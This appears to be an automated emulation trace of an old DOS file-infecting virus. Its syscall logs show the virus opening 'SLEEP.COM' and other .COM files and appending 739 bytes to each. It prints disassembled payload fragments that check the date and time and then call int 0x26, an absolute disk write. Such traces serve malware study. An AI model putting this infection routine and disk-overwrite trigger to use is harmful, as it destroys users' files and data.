0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:15.853093037Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:15.856049736Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:15.858352176Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:15.864194343Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:15.476466158Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:15.478487707Z 78 PC: 12afb | Find first file
2018-12-25T12:55:15.485904972Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:15.49398367Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:15.502684461Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:15.504893596Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.507991132Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:15.524792482Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:15.526931223Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.535641328Z 62 PC: 12aef | Close file
2018-12-25T12:55:15.545120794Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.549086756Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.557797265Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.565185833Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.567560557Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.571176746Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.580412574Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.583372642Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.593007014Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.605281035Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.608653092Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.613060807Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.618567802Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.620432982Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.62247416Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.632890558Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.634313527Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.641422991Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.648347948Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.650414191Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.65505442Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.660276684Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.661971156Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.664168175Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.670710994Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.677716991Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.68539397Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.694557134Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.704777261Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.709662151Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.714263096Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.716474667Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.718449458Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.72391171Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.727683931Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.734351346Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.741410468Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.745337097Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.754012292Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.76122804Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.76323481Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.766767364Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.776204128Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.777652817Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.78523521Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.793765913Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.79638987Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.803708811Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.810902566Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.812309673Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.816918952Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.825302808Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.826903035Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.83488875Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.844956779Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.847686777Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.854873985Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.858433572Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.860664428Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.863570193Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:15.866463682Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:15.869053032Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:15.871470767Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:15.878125508Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:15.674269427Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:15.680922349Z 78 PC: 12afb | Find first file
2018-12-25T12:55:15.686735363Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:15.692971287Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:15.699440727Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:15.700686578Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.70317364Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:15.719257354Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:15.720653858Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.726907424Z 62 PC: 12aef | Close file
2018-12-25T12:55:15.735252743Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.737912277Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.744319068Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.750881534Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.752829576Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.755281744Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.763156896Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.764875114Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.771197794Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.779254209Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.782889378Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.789180604Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.795340502Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.797142959Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.7997276Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.807448198Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.809429022Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.81581133Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.824283982Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.827455318Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.833795073Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.839929297Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.841899707Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.844418044Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.852503723Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.858574684Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.864847106Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.872700278Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.876841768Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.883237348Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.889470423Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.891087959Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.893792914Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.90159649Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.912170614Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.918731681Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.927411451Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.930266012Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.937284622Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.943369665Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.944630511Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.947718Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.956253051Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.957623265Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.964657628Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.972976953Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.975450868Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.982173156Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.988652338Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.989863409Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.993142871Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.000711078Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.001971447Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.010898952Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.018466516Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.020659945Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.026805825Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.029067612Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.030577749Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.032794534Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:16.034690149Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:16.036703084Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:15.779593167Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:15.78153265Z 78 PC: 12afb | Find first file
2018-12-25T12:55:15.789176338Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:15.796650151Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:15.804655716Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:15.806260835Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.809190289Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:15.825730441Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:15.827367788Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.83508444Z 62 PC: 12aef | Close file
2018-12-25T12:55:15.844469456Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.84876293Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.855111457Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.859776581Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.862328447Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.866367591Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.876964118Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.879928439Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.887851137Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.89767241Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.902131983Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.909831839Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.917598368Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.920324495Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.925254801Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.934587244Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.936286211Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.943810409Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.953316694Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.95680674Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.965146204Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.972495392Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.974278408Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.978117987Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.987643243Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.989113649Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.998180593Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.007364807Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.010285177Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.019460959Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.026809431Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.028473387Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.031820308Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.038331694Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.039804684Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.047296917Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.057589042Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.06046621Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.068002295Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.075712458Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.077207521Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.080178628Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.09119721Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.092847291Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.10042705Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.110432098Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.113719194Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.121940245Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.129718152Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.13142562Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.134334133Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.144376281Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.14600724Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.15329313Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.162943913Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.166107553Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.173776299Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.177827031Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.179893114Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.182561244Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:16.185942329Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:16.196426981Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:15.802903826Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:15.803977752Z 78 PC: 12afb | Find first file
2018-12-25T12:55:15.807558543Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:15.81135921Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:15.815435963Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:15.816424342Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.818867019Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:15.833694612Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:15.8349427Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.840994031Z 62 PC: 12aef | Close file
2018-12-25T12:55:15.848630988Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.851146285Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.857263498Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.863599878Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.864962553Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.867340752Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.87549351Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.877622346Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.884205887Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.892381382Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.89665971Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.903035908Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.909286564Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.911057337Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.913650262Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.921400513Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.923778791Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.930186452Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.938428448Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.941396446Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.947980966Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.954285349Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.956885314Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.959988898Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.968009831Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.969818363Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.97505796Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.982934526Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.985752744Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.005218724Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.011293189Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.013045159Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.015574298Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.022404485Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.024088916Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.028083982Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.033189679Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.035283155Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.039395166Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.04317653Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.044600746Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.046308199Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.051514467Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.052920355Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.059299608Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.067670923Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.070594972Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.076931728Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.082996211Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.084797419Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.087288563Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.094937759Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.096558802Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.103385227Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.113045543Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.116280034Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.123027465Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.12555173Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.127773437Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.130417886Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
